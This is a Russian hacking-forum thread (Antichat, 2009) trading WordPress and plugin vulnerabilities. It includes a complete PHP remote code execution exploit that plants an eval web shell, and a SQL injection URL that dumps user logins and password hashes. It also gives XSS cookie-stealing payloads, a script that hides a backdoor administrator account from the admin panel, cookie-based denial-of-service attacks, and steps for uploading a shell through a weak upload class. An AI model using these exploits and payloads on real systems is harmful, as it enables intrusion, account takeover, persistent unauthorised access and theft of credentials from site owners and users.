Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.01.2009, 13:40
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Насчет get_browser() тоже думал, но эта функция действительно мало, гда работает.
Если в PHPSESSID помещать данные в base64, то нужно составлять такие строки, чтобы в них не было символов =.
Функция call_user_func_array() не допускает использование eval() в качестве callback'а, но твой способ обхода этого ограничения с помощью assert() очень порадовал =)
|
|
|
09.01.2009, 07:48
|
|
Новичок
Регистрация: 29.03.2007
Сообщений: 10
Провел на форуме:
124613
Репутация:
0
|
|
cкажите имея логин/хеш от версии 2.5 и SECRET_KEY, подставить кукис можно или нет?
пол ночи убил так и не получилось  |
|
|
|
09.01.2009, 17:55
|
|
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673
Репутация:
784
|
|
>cкажите имея логин/хеш от версии 2.5 и SECRET_KEY, подставить кукис можно или нет?
перелистай тему, выкладывали тут тулзу для этого.
можно, только если кей из wp-config.php оставлен дефолтным
Последний раз редактировалось M4g; 09.01.2009 в 17:58..
|
|
|
|
wordpress can be subject of delayed attacks via cookies |
09.01.2009, 17:59
|
|
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673
Репутация:
784
|
|
wordpress can be subject of delayed attacks via cookies
Attack: Denial Of Service
Required cookies: GLOBALS=<anything>
Triggering file: index.php (just an example, basically any file including the
affected file)
Affected file: wp-settings.php
Effect: no request is processed as it aborts because of the presence of
GLOBALS in $_REQUEST
Attack: Deletion of users
Required cookies: action=dodelete, delete_option=delete, users[]=n (where n is
an integer)
Triggering file: wp-admin/users.php
Affected file: wp-admin/users.php
Note: this doesn't affect etch's version as it correctly uses $_POST
Attack: Denial Of Service
Required cookies: action=logout
Triggering file: wp-login.php
Affected file: wp-login.php
Effect: redirection loop, preventing the user from logging in
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504771
http://trac.wordpress.org/ticket/8814 |
|
|
|
11.01.2009, 16:14
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
XSS wp-slimstat 0.92
Код:
http://site/wp-admin/index.php?page=wp-sl
imstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
|
|
|
Wordpress 2.7.0 admin remote code execution vulnerability |
08.02.2009, 06:44
|
|
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673
Репутация:
784
|
|
Wordpress 2.7.0 admin remote code execution vulnerability
by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
date: 2008-12-18
PHP код:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Wordpress 2.7.0 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
site: http://www.80vul.com
dork: "powered by WordPress"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 6) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass post
host: target server (ip/hostname)
path: path to wordpress
user: admin login username
pass: admin login password
post: the available post id
Example:
php '.$argv[0].' localhost /wp/ admin 123456 1
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$post = $argv[5];
$shellcode = '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\'';
//$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//';
$shell = 'http://'.$host.$path.'wp-content/plugins/wolvez.php';
/**
* wolvez.php has this code:
* <?eval($_POST[c])?>
*/
$url = $path.'wp-login.php';
$cmd = 'log='.urlencode($user).'&pwd='.urlencode($pass);
$resp = send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);
if (!$admin_cookie)
exit("Exploit Failed!\n");
$url = $path.'wp-admin/user-new.php#add-new-user';
$cmd = '';
$resp = send($admin_cookie[1]);
preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/', $resp, $_wpnonce);
if (!$_wpnonce)
exit("Exploit Failed!\n");
$cmd = '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode;
$resp = send($admin_cookie[1]);
if (strpos($resp, 'users.php?usersearch=ryat&update=add#user') === false)
exit("Exploit Failed!\n");
$url = $path.'wp-login.php';
$cmd = 'log=ryat&pwd=123456';
$resp = send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);
if (!$editor_cookie)
exit("Exploit Failed!\n");
$url = $path.'wp-admin/post.php?action=edit&post='.$post;
$cmd = '';
send($editor_cookie[1]);
send($admin_cookie[1]);
if (strpos(file_get_contents($shell), 'puret_t') !== false)
exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
exit("Exploit Failed!\n");
function send($cookie = '')
{
global $host, $path, $url, $cmd;
$data = "POST $url HTTP/1.1\r\n";
$data .= "Accept: */*\r\n";
$data .= "Accept-Language: zh-cn\r\n";
$data .= "Referer: http://$host$path\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($cmd)."\r\n";
$data .= "Connection: Close\r\n";
$data .= "Cookie: $cookie\r\n\r\n";
$data .= $cmd;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?>
Подробности уязвимости
wp-admin/post.php
PHP код:
if ( current_user_can('edit_post', $post_ID) ) {
if ( $last = wp_check_post_lock( $post->ID ) ) {
$last_user = get_userdata( $last );
$last_user_name = $last_user ? $last_user->display_name : __('Somebody');
$message = sprintf( __( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );
$message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );
add_action('admin_notices', create_function( '', "echo '$message';" ) );
//[ex:\';phpinfo();\'];
} else {
wp_set_post_lock( $post->ID );
wp_enqueue_script('autosave');
}
}
|
|
|
|
Добавление невидимого админа (1.5-2.3.3) |
13.02.2009, 08:56
|
|
Участник форума
Регистрация: 08.05.2007
Сообщений: 164
Провел на форуме:
466673
Репутация:
784
|
|
Добавление невидимого админа (1.5-2.3.3)
Итак, представим, что у нас уже есть доступ к бд и нам необходимо закрепиться на блоге. Для этого создаем нового юзера, даем ему права админа и в бд в таблице wp_usermeta в поле first_name с ИД нашего юзера прописываем:
PHP код:
<b id="user_superuser"><script language="JavaScript">
var setUserName = function(){
try{
var t=document.getElementById("user_superuser");
while(t.nodeName!="TR"){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName("H3");
var s = " shown below";
for (var i = 0; i < tags.length; i++) {
var t=tags[i].innerHTML;
var h=tags[i];
if(t.indexOf(s)>0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName("ul");
for(var i in arr) if(arr[i].className=="subsubsub"){
var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
if(n[1]>0){
var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</script>" /></label></p>
В итоге, наш админчег не будет виден на странице wp-admin/users.php =)
Для версий 2.5-2.7 могут быть свои вариации. |
|
|
|
14.02.2009, 13:44
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability
exploit:
Код:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]
Код:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
источник: http://milw0rm.com/
|
|
|
|
Уязвимости модулей WordPress |
28.02.2009, 16:09
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
Уязвимости модулей WordPress
Уязвимость в модуле статистики wassup
Version: 1.6.4 (вроде как и <=1.6.4)
Активная XSS
Не фильтруется поле Referrer. Уязвимость есть в двух местах: на главной странице статистики и подробной статистике по IP.
Первый код подробной статистики(wassup/lib/action.php):
PHP код:
$raw_table = $wpdb->get_results("SELECT ip, hostname, agent, referrer, search, searchpage, os, browser, language FROM $table_name WHERE wassup_id='".urlencode(attribute_escape($_GET['wassup_id']))."' ORDER BY timestamp ASC LIMIT 1"); ?>
<div><h2><?php _e("Raw data","wassup"); ?>:</h2>
<ul style="list-style-type:none;padding:20px 0 0 30px;">
<?php foreach ($raw_table as $rt) { ?>
...
<li><?php echo __("Referrer","wassup").": ".urldecode($rt->referrer); ?></li>
...
<?php }
} //end foreach ?>
Второй код(wassup/lib/main.php):
PHP код:
$referrer = '<a href="'.$cv->referrer.'" target=_"BLANK">'.stringShortener($cv->referrer, round($max_char_len*.9,0)).'</a>';
...
<?php print $referrer; ?>
Пример:
Код:
GET /wp/ HTTP/1.0
User-Agent: [любой User agent]
Host: localhost
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: XSS к примеру Referer: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3C%2F%73%63%72%69%70%74%3E
Proxy-Connection: Keep-Alive
Ну а что бы увидеть эту xss заходим в админку->wassup и лицезреем =)
|
|
|
|
02.03.2009, 20:48
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
Уязвимость в модуле Connections
Version: 0.4.0 (вроде как и <=0.4.0) в частности класс php_class_upload v.0.26 и ниже
В комплекте с модулем есть папка php_class_upload содержащая класс по работе с файлами(класс не от разработчиков модуля, а сторонний, подробнее можно посмотреть здесь http://www.verot.net/php_class_upload.htm) так вот в этом классе из за не достаточной фильтрации расширения загружаемых файлов в class.upload.php:
PHP код:
// turn dangerous scripts into text files
if ($this->no_script) {
if (((substr($this->file_src_mime, 0, 5) == 'text/' || strpos($this->file_src_mime, 'javascript') !== false) && (substr($this->file_src_name, -4) != '.txt'))
|| preg_match('/\.(php|pl|py|cgi|asp)$/i', $this->file_src_name) || empty($this->file_src_name_ext)) {
$this->file_src_mime = 'text/plain';
$this->log .= '- script ' . $this->file_src_name . ' renamed as ' . $this->file_src_name . '.txt!<br />';
$this->file_src_name_ext .= (empty($this->file_src_name_ext) ? 'txt' : '.txt');
}
}
можно залить сначала файл с расширением .htaccess в котором указать AddType application/x-httpd-php .someext ну а дальше уже сам шелл shell.someext, или сразу .phtml или .html
Папку с классом многие копируют без изменений, а файл index.html содержит тестовую форму по загрузке файлов... Вобщем удобная форма по загрузке шела =) к примеру посмотреть можно на оф сайте модуля
Код:
http://www.shazahm.net/wp-content/plugins/connections/php_class_upload/
ну и из за недостаточной фильтрации будут уязвимо все где использован этот класс...
Последний раз редактировалось Kraneg; 02.03.2009 в 22:48..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
